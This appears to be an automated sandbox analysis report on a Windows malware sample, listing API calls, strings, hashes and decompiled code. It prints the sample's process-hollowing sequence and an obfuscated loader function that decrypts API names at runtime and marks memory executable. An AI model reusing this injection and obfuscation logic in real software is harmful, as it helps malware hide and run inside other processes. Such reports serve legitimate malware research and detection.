0x00405c42

APIs

AddAtomW.KERNEL32(sR~VjZBN-uIkY), ref: 004048AC
GetCurrentProcessId.KERNEL32 ref: 0040495A

Part of subcall function 004042B0: GetFileVersionInfoW.VERSION(?,0000008E,00000080,?), ref: 004042C8

VerInstallFileW.VERSION(000000E7,?,?,?,?,?,?,?), ref: 00404A12

Part of subcall function 004066B0: GetFileVersionInfoSizeW.VERSION(?,?,?,?), ref: 004066BE

GetFileVersionInfoW.VERSION(?,000000DE,0000009D,?,?,?), ref: 00404C83
VerQueryValueW.VERSION(?,?,?,?,?,?), ref: 00404DF7
AssignProcessToJobObject.KERNEL32 ref: 00404E61
AssignProcessToJobObject.KERNEL32 ref: 00404EFF
DeleteAtom.KERNEL32(?), ref: 0040536E
AddAtomW.KERNEL32(N3B2), ref: 0040591E
DeleteAtom.KERNEL32(?), ref: 004059E6
ReleaseSemaphore.KERNEL32(00000000,00000000,00000000), ref: 00405A05
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00405A5A
FreeConsole.KERNELBASE ref: 00405C1E
DeleteAtom.KERNEL32(?), ref: 00405C80
AssignProcessToJobObject.KERNEL32 ref: 00405D4F
DeleteAtom.KERNEL32(?), ref: 00405E87
ReleaseSemaphore.KERNEL32(00000000,00000000,00000000), ref: 00405FDC
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004060EE
PulseEvent.KERNEL32(00000000), ref: 00406239
GetCurrentProcessId.KERNEL32 ref: 0040634D
ILGetSize.SHELL32(?), ref: 0040667E

Strings

v, xrefs: 00405F12
n, xrefs: 00404C1C
hm, xrefs: 0040477B
sR~VjZBN-uIkY, xrefs: 004048A7
N3B2, xrefs: 00405919
d, xrefs: 00404D3C
P, xrefs: 004042F9
p, xrefs: 00405E50
', xrefs: 00404300

Memory Dump Source

Source File: 00000000.00000002.303536971.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.303524803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303587969.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303597691.0000000000413000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303642442.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hZDPlQwZ9D.jbxd

Yara matches

Similarity

API ID: Atom$Process$DeleteFile$AssignEventInfoObjectVersion$CreateCurrentReleaseSemaphoreSize$ConsoleFreeInstallPulseQueryValue
String ID: '$N3B2$P$d$hm$n$p$sR~VjZBN-uIkY$v
API String ID: 2661649662-419248133
Opcode ID: 242dbce281a0db58b476c7971eac2533dbca49acfbfa329071df5c334169fe6b
Instruction ID: 2cd40483df1d6ffd841ff079b8cb60a9b35198c684a8de14ea72899301c37c35
Opcode Fuzzy Hash: 242dbce281a0db58b476c7971eac2533dbca49acfbfa329071df5c334169fe6b
Instruction Fuzzy Hash: 6243C274A056688FCB68CF68C890BEDBBF1BF8A301F1481DAD949A7354D6346E81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00413189 Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 467
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041346A
GetThreadContext.KERNELBASE(?,00010007), ref: 0041347F
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 004134A0
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 004134D2
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 004134F2
WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000), ref: 00413625
VirtualProtectEx.KERNELBASE(?,?,?,00000002,?), ref: 00413642
VirtualProtectEx.KERNELBASE(?,?,?,00000001,?), ref: 004136AC
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004136CE
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 004136E9
SetThreadContext.KERNELBASE(?,00010007), ref: 00413706
ResumeThread.KERNELBASE(?), ref: 00413713

Strings

D, xrefs: 004133C2

Memory Dump Source

Source File: 00000000.00000002.303597691.0000000000413000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.303524803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303536971.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303587969.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303642442.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hZDPlQwZ9D.jbxd

Yara matches

Similarity

API ID: Virtual$Process$MemoryThread$AllocContextProtectWrite$CreateFreeReadResume
String ID: D
API String ID: 12256240-2746444292
Opcode ID: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
Instruction ID: 439529c2fa45a591a1190f89c1ead9887493916b3787c40c80b9a2287fa61d01
Opcode Fuzzy Hash: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
Instruction Fuzzy Hash: D21218B1D00219ABDF21CFA4CD84BEEBBB5FF04705F1484AAE519E6290E7749A84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004018B0 Relevance: 29.1, APIs: 3, Strings: 13, Instructions: 1132
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E004018B0(signed int __eax, void* _a4, long _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				long _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				struct HINSTANCE__* _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed char _v112;
				signed int _v113;
				signed int _v120;
				signed int _v121;
				signed char _t648;
				void* _t746;

				_t648 = __eax;
				_v16 =  *0x410978;
				_v16 =  *0x410974;
				_v16 =  *0x410970;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((__eax & 0x00000044) == 0) {
					_v16 =  *0x41096c;
					_v16 =  *0x410968;
				}
				_v16 =  *0x410964;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v16 =  *0x410960;
					_v16 =  *0x41095c;
				}
				_v16 =  *0x410958;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v16 =  *0x410954;
					_v16 =  *0x410950;
				}
				_v16 =  *0x41094c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v16 =  *0x410948;
					_v16 =  *0x410944;
				}
				_v16 =  *0x410940;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v16 =  *0x41093c;
					_v16 =  *0x410938;
				}
				_v96 =  *0x410934;
				_v96 =  *0x410930;
				_v96 =  *0x41092c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v96 =  *0x410928;
					_v96 =  *0x410924;
				}
				_v96 =  *0x410920;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v96 =  *0x41091c;
					_v96 =  *0x410918;
				}
				_v96 =  *0x410914;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v96 =  *0x410910;
					_v96 =  *0x41090c;
				}
				_v96 =  *0x410908;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v96 =  *0x410904;
					_v96 =  *0x410900;
				}
				_v96 =  *0x4108fc;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v96 =  *0x4108f8;
					_v96 =  *0x4108f4;
				}
				_v12 =  *0x4108f0;
				_v12 =  *0x4108ec;
				_v12 =  *0x4108e8;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v12 =  *0x4108e4;
					_v12 =  *0x4108e0;
				}
				_v12 =  *0x4108dc;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v12 =  *0x4108d8;
					_v12 =  *0x4108d4;
				}
				_v12 =  *0x4108d0;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v12 =  *0x4108cc;
					_v12 =  *0x4108c8;
				}
				_v12 =  *0x4108c4;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v12 =  *0x4108c0;
					_v12 =  *0x4108bc;
				}
				_v12 =  *0x4108b8;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v12 =  *0x4108b4;
					_v12 =  *0x4108b0;
				}
				_v108 =  *0x4108ac;
				_v108 =  *0x4108a8;
				_v108 =  *0x4108a4;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v108 =  *0x4108a0;
					_v108 =  *0x41089c;
				}
				_v108 =  *0x410898;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v108 =  *0x410894;
					_v108 =  *0x410890;
				}
				_v108 =  *0x41088c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v108 =  *0x410888;
					_v108 =  *0x410884;
				}
				_v108 =  *0x410880;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v108 =  *0x41087c;
					_v108 =  *0x410878;
				}
				_v108 =  *0x410874;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v108 =  *0x410870;
					_v108 =  *0x41086c;
				}
				_v88 =  *0x410868;
				_v88 =  *0x410864;
				_v88 =  *0x410860;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v88 =  *0x41085c;
					_v88 =  *0x410858;
				}
				_v88 =  *0x410854;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v88 =  *0x410850;
					_v88 =  *0x41084c;
				}
				_v88 =  *0x410848;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v88 =  *0x410844;
					_v88 =  *0x410840;
				}
				_v88 =  *0x41083c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v88 =  *0x410838;
					_v88 =  *0x410834;
				}
				_v88 =  *0x410830;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v88 =  *0x41082c;
					_v88 =  *0x410828;
				}
				_v92 =  *0x410824;
				_v92 =  *0x410820;
				_v92 =  *0x41081c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v92 =  *0x410818;
					_v92 =  *0x410814;
				}
				_v92 =  *0x410810;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v92 =  *0x41080c;
					_v92 =  *0x410808;
				}
				_v92 =  *0x410804;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v92 =  *0x410800;
					_v92 =  *0x4107fc;
				}
				_v92 =  *0x4107f8;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v92 =  *0x4107f4;
					_v92 =  *0x4107f0;
				}
				_v92 =  *0x4107ec;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v92 =  *0x4107e8;
					_v92 =  *0x4107e4;
				}
				_v104 =  *0x4107e0;
				_v104 =  *0x4107dc;
				_v104 =  *0x4107d8;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v104 =  *0x4107d4;
					_v104 =  *0x4107d0;
				}
				_v104 =  *0x4107cc;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v104 =  *0x4107c8;
					_v104 =  *0x4107c4;
				}
				_v104 =  *0x4107c0;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v104 =  *0x4107bc;
					_v104 =  *0x4107b8;
				}
				_v104 =  *0x4107b4;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v104 =  *0x4107b0;
					_v104 =  *0x4107ac;
				}
				_v104 =  *0x4107a8;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v104 =  *0x4107a4;
					_v104 =  *0x4107a0;
				}
				_v8 =  *0x41079c;
				_v8 =  *0x410798;
				_v8 =  *0x410794;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v8 =  *0x410790;
					_v8 =  *0x41078c;
				}
				_v8 =  *0x410788;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v8 =  *0x410784;
					_v8 =  *0x410780;
				}
				_v8 =  *0x41077c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v8 =  *0x410778;
					_v8 =  *0x410774;
				}
				_v8 =  *0x410770;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v8 =  *0x41076c;
					_v8 =  *0x410768;
				}
				_v8 =  *0x410764;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v8 =  *0x410760;
					_v8 =  *0x41075c;
				}
				_v76 = 4;
				_v75 = 0xac;
				_v74 = 0xcb;
				_v73 = 0x2c;
				_v72 = 0xcb;
				_v71 = 0x2f;
				_v70 = 0xcf;
				_v69 = 0xa4;
				_v68 = 0xc;
				_v67 = 0x31;
				_v66 = 0x4f;
				_v65 = 0x63;
				_v64 = 0x43;
				_v63 = 0x6e;
				_v62 = 0xcb;
				_v112 = 0;
				while(_v112 < 0xf) {
					_v113 =  *((intOrPtr*)(_t746 + _v112 - 0x48));
					_v113 = (_v113 & 0x000000ff) >> 0x00000005 | (_v113 & 0x000000ff) << 0x00000003;
					_v113 = (_v113 & 0x000000ff) - _v112;
					_v113 =  ~(_v113 & 0x000000ff);
					_v113 = (_v113 & 0x000000ff) + _v112;
					_v113 =  !(_v113 & 0x000000ff);
					_v113 = _v113 & 0x000000ff ^ 0x000000c0;
					_v113 = (_v113 & 0x000000ff) + _v112;
					_v113 = _v113 & 0x000000ff ^ _v112;
					_v113 =  ~(_v113 & 0x000000ff);
					_v113 = (_v113 & 0x000000ff) + _v112;
					_v113 = _v113 & 0x000000ff ^ 0x000000f8;
					_v113 =  !(_v113 & 0x000000ff);
					_v113 = _v113 & 0x000000ff ^ 0x000000d4;
					_v113 = (_v113 & 0x000000ff) >> 0x00000001 | (_v113 & 0x000000ff) << 0x00000007;
					_v113 = _v113 & 0x000000ff ^ 0x0000002f;
					 *((char*)(_t746 + _v112 - 0x48)) = _v113;
					_t648 = _v112 + 1;
					_v112 = _t648;
				}
				_v84 =  *0x410758;
				_v84 =  *0x410754;
				_v84 =  *0x410750;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v84 =  *0x41074c;
					_v84 =  *0x410748;
				}
				_v84 =  *0x410744;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v84 =  *0x410740;
					_v84 =  *0x41073c;
				}
				_v84 =  *0x410738;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v84 =  *0x410734;
					_v84 =  *0x410730;
				}
				_v84 =  *0x41072c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v84 =  *0x410728;
					_v84 =  *0x410724;
				}
				_v84 =  *0x410720;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v84 =  *0x41071c;
					_v84 =  *0x410718;
				}
				_v100 =  *0x410714;
				_v100 =  *0x410710;
				_v100 =  *0x41070c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v100 =  *0x410708;
					_v100 =  *0x410704;
				}
				_v100 =  *0x410700;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v100 =  *0x4106fc;
					_v100 =  *0x4106f8;
				}
				_v100 =  *0x4106f4;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v100 =  *0x4106f0;
					_v100 =  *0x4106ec;
				}
				_v100 =  *0x4106e8;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v100 =  *0x4106e4;
					_v100 =  *0x4106e0;
				}
				_v100 =  *0x4106dc;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v100 =  *0x4106d8;
					_v100 =  *0x4106d4;
				}
				_v60 =  *0x4106d0;
				_v60 =  *0x4106cc;
				_v60 =  *0x4106c8;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v60 =  *0x4106c4;
					_v60 =  *0x4106c0;
				}
				_v60 =  *0x4106bc;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v60 =  *0x4106b8;
					_v60 =  *0x4106b4;
				}
				_v60 =  *0x4106b0;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v60 =  *0x4106ac;
					_v60 =  *0x4106a8;
				}
				_v60 =  *0x4106a4;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v60 =  *0x4106a0;
					_v60 =  *0x41069c;
				}
				_v60 =  *0x410698;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v60 =  *0x410694;
					_v60 =  *0x410690;
				}
				_v56 =  *0x41068c;
				_v56 =  *0x410688;
				_v56 =  *0x410684;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v56 =  *0x410680;
					_v56 =  *0x41067c;
				}
				_v56 =  *0x410678;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v56 =  *0x410674;
					_v56 =  *0x410670;
				}
				_v56 =  *0x41066c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v56 =  *0x410668;
					_v56 =  *0x410664;
				}
				_v56 =  *0x410660;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v56 =  *0x41065c;
					_v56 =  *0x410658;
				}
				_v56 =  *0x410654;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v56 =  *0x410650;
					_v56 =  *0x41064c;
				}
				_v20 =  *0x410648;
				_v20 =  *0x410644;
				_v20 =  *0x410640;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v20 =  *0x41063c;
					_v20 =  *0x410638;
				}
				_v20 =  *0x410634;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v20 =  *0x410630;
					_v20 =  *0x41062c;
				}
				_v20 =  *0x410628;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v20 =  *0x410624;
					_v20 =  *0x410620;
				}
				_v20 =  *0x41061c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v20 =  *0x410618;
					_v20 =  *0x410614;
				}
				_v20 =  *0x410610;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v20 =  *0x41060c;
					_v20 =  *0x410608;
				}
				_v44 =  *0x410604;
				_v44 =  *0x410600;
				_v44 =  *0x4105fc;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v44 =  *0x4105f8;
					_v44 =  *0x4105f4;
				}
				_v44 =  *0x4105f0;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v44 =  *0x4105ec;
					_v44 =  *0x4105e8;
				}
				_v44 =  *0x4105e4;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v44 =  *0x4105e0;
					_v44 =  *0x4105dc;
				}
				_v44 =  *0x4105d8;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v44 =  *0x4105d4;
					_v44 =  *0x4105d0;
				}
				_v44 =  *0x4105cc;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v44 =  *0x4105c8;
					_v44 =  *0x4105c4;
				}
				_v52 =  *0x4105c0;
				_v52 =  *0x4105bc;
				_v52 =  *0x4105b8;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v52 =  *0x4105b4;
					_v52 =  *0x4105b0;
				}
				_v52 =  *0x4105ac;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v52 =  *0x4105a8;
					_v52 =  *0x4105a4;
				}
				_v52 =  *0x4105a0;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v52 =  *0x41059c;
					_v52 =  *0x410598;
				}
				_v52 =  *0x410594;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v52 =  *0x410590;
					_v52 =  *0x41058c;
				}
				_v52 =  *0x410588;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v52 =  *0x410584;
					_v52 =  *0x410580;
				}
				_v40 =  *0x41057c;
				_v40 =  *0x410578;
				_v40 =  *0x410574;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v40 =  *0x410570;
					_v40 =  *0x41056c;
				}
				_v40 =  *0x410568;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v40 =  *0x410564;
					_v40 =  *0x410560;
				}
				_v40 =  *0x41055c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v40 =  *0x410558;
					_v40 =  *0x410554;
				}
				_v40 =  *0x410550;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v40 =  *0x41054c;
					_v40 =  *0x410548;
				}
				_v40 =  *0x410544;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v40 =  *0x410540;
					_v40 =  *0x41053c;
				}
				_v36 = 0x53;
				_v35 = 0xa9;
				_v34 = 0xbb;
				_v33 = 0x45;
				_v32 = 0x74;
				_v31 = 0x8c;
				_v30 = 0xaf;
				_v29 = 0x77;
				_v28 = 0x36;
				_v27 = 0xbb;
				_v26 = 0xe4;
				_v25 = 0x1f;
				_v24 = 0xfb;
				_v120 = 0;
				while(_v120 < 0xd) {
					_v121 =  *((intOrPtr*)(_t746 + _v120 - 0x20));
					_v121 = (_v121 & 0x000000ff) - _v120;
					_v121 = (_v121 & 0x000000ff) >> 0x00000006 | (_v121 & 0x000000ff) << 0x00000002;
					_v121 = (_v121 & 0x000000ff) + 0xee;
					_v121 =  ~(_v121 & 0x000000ff);
					_v121 = _v121 & 0x000000ff ^ _v120;
					_v121 =  ~(_v121 & 0x000000ff);
					_v121 = (_v121 & 0x000000ff) >> 0x00000002 | (_v121 & 0x000000ff) << 0x00000006;
					_v121 =  !(_v121 & 0x000000ff);
					_v121 = (_v121 & 0x000000ff) + 0x45;
					_v121 = _v121 & 0x000000ff ^ _v120;
					_v121 = (_v121 & 0x000000ff) - _v120;
					_v121 = _v121 & 0x000000ff ^ _v120;
					_v121 = (_v121 & 0x000000ff) + 0x15;
					_v121 = (_v121 & 0x000000ff) >> 0x00000002 | (_v121 & 0x000000ff) << 0x00000006;
					_v121 = (_v121 & 0x000000ff) + 0x89;
					 *((char*)(_t746 + _v120 - 0x20)) = _v121;
					_v120 = _v120 + 1;
				}
				_v80 = GetModuleHandleA( &_v36);
				_v48 = 0;
				 *0x436128 = GetProcAddress(_v80,  &_v76);
				VirtualProtect(_a4, _a8, 0x40,  &_v48); // executed
				return 0;
			}

0x004018b0
0x004018bc
0x004018c5
0x004018ce
0x004018d4
0x004018da
0x004018df
0x004018e7
0x004018f0
0x004018f0
0x004018f9
0x004018ff
0x00401905
0x0040190a
0x00401912
0x0040191b
0x0040191b
0x00401924
0x0040192a
0x00401930
0x00401935
0x0040193d
0x00401946
0x00401946
0x0040194f
0x00401955
0x0040195b
0x00401960
0x00401968
0x00401971
0x00401971
0x0040197a
0x00401980
0x00401986
0x0040198b
0x00401993
0x0040199c
0x0040199c
0x004019a5
0x004019ae
0x004019b7
0x004019bd
0x004019c3
0x004019c8
0x004019d0
0x004019d9
0x004019d9
0x004019e2
0x004019e8
0x004019ee
0x004019f3
0x004019fb
0x00401a04
0x00401a04
0x00401a0d
0x00401a13
0x00401a19
0x00401a1e
0x00401a26
0x00401a2f
0x00401a2f
0x00401a38
0x00401a3e
0x00401a44
0x00401a49
0x00401a51
0x00401a5a
0x00401a5a
0x00401a63
0x00401a69
0x00401a6f
0x00401a74
0x00401a7c
0x00401a85
0x00401a85
0x00401a8e
0x00401a97
0x00401aa0
0x00401aa6
0x00401aac
0x00401ab1
0x00401ab9
0x00401ac2
0x00401ac2
0x00401acb
0x00401ad1
0x00401ad7
0x00401adc
0x00401ae4
0x00401aed
0x00401aed
0x00401af6
0x00401afc
0x00401b02
0x00401b07
0x00401b0f
0x00401b18
0x00401b18
0x00401b21
0x00401b27
0x00401b2d
0x00401b32
0x00401b3a
0x00401b43
0x00401b43
0x00401b4c
0x00401b52
0x00401b58
0x00401b5d
0x00401b65
0x00401b6e
0x00401b6e
0x00401b77
0x00401b80
0x00401b89
0x00401b8f
0x00401b95
0x00401b9a
0x00401ba2
0x00401bab
0x00401bab
0x00401bb4
0x00401bba
0x00401bc0
0x00401bc5
0x00401bcd
0x00401bd6
0x00401bd6
0x00401bdf
0x00401be5
0x00401beb
0x00401bf0
0x00401bf8
0x00401c01
0x00401c01
0x00401c0a
0x00401c10
0x00401c16
0x00401c1b
0x00401c23
0x00401c2c
0x00401c2c
0x00401c35
0x00401c3b
0x00401c41
0x00401c46
0x00401c4e
0x00401c57
0x00401c57
0x00401c60
0x00401c69
0x00401c72
0x00401c78
0x00401c7e
0x00401c83
0x00401c8b
0x00401c94
0x00401c94
0x00401c9d
0x00401ca3
0x00401ca9
0x00401cae
0x00401cb6
0x00401cbf
0x00401cbf
0x00401cc8
0x00401cce
0x00401cd4
0x00401cd9
0x00401ce1
0x00401cea
0x00401cea
0x00401cf3
0x00401cf9
0x00401cff
0x00401d04
0x00401d0c
0x00401d15
0x00401d15
0x00401d1e
0x00401d24
0x00401d2a
0x00401d2f
0x00401d37
0x00401d40
0x00401d40
0x00401d49
0x00401d52
0x00401d5b
0x00401d61
0x00401d67
0x00401d6c
0x00401d74
0x00401d7d
0x00401d7d
0x00401d86
0x00401d8c
0x00401d92
0x00401d97
0x00401d9f
0x00401da8
0x00401da8
0x00401db1
